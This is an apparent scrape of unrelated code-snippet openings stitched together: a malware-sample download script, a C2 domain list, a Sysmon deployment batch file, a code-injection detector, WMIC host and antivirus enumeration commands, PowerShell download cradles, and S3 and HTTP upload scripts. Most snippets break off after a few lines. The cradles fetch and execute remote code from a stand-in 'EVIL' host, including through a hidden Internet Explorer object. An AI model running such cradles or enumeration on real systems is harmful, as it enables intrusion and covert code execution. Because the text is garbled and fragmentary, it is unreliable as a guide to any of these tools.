# Bash script to download Malware Bazaar based on tag
# Define tag and number of samples to download
TAG=insert-malware-bazaar-tag
DOWNLOAD_LIMIT=100
# Determine OS
OS=$(uname -s)
# Download hash values from tag, save the SHA256 hashes
# C2 FQDNs
first seen           fqdn
2019-12-11 23:37:10  updatemanagir.us
2019-12-20 17:51:05  cmdupdatewin.com
2019-12-26 18:03:27  scrservallinst.info
2020-01-10 00:33:57  winsystemupdate.com
2020-01-11 23:16:41  jomamba.best
2020-01-13 05:13:43  updatewinlsass.com
2020-01-16 11:38:53  winsysteminfo.com
2020-01-20 05:58:17  livecheckpointsrs.com
@echo off
:: Author: Ryan Watson
:: Twitter: @gentlemanwatson
:: Version: 1.0
:: Credits: Credit to Syspanda.com and their Sysmon GPO article for the kick off point
:: https://www.syspanda.com/index.php/2017/02/28/deploying-sysmon-through-gpo/
:: ** IMPORTANT **
:: 1) Create a Sysmon folder with the SYSVOL share on your domain controller
:: 2) Download Sysmon from Microsoft and place both sysmon.exe and sysmon64.exe in
import zipfile
import io
import sys
import os
import imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine
# This is how I upload my new Sol Trader builds (http://soltrader.net)
# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash
S3KEY="my aws key"
S3SECRET="my aws secret" # pass these in
function putS3
{
path=$1
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""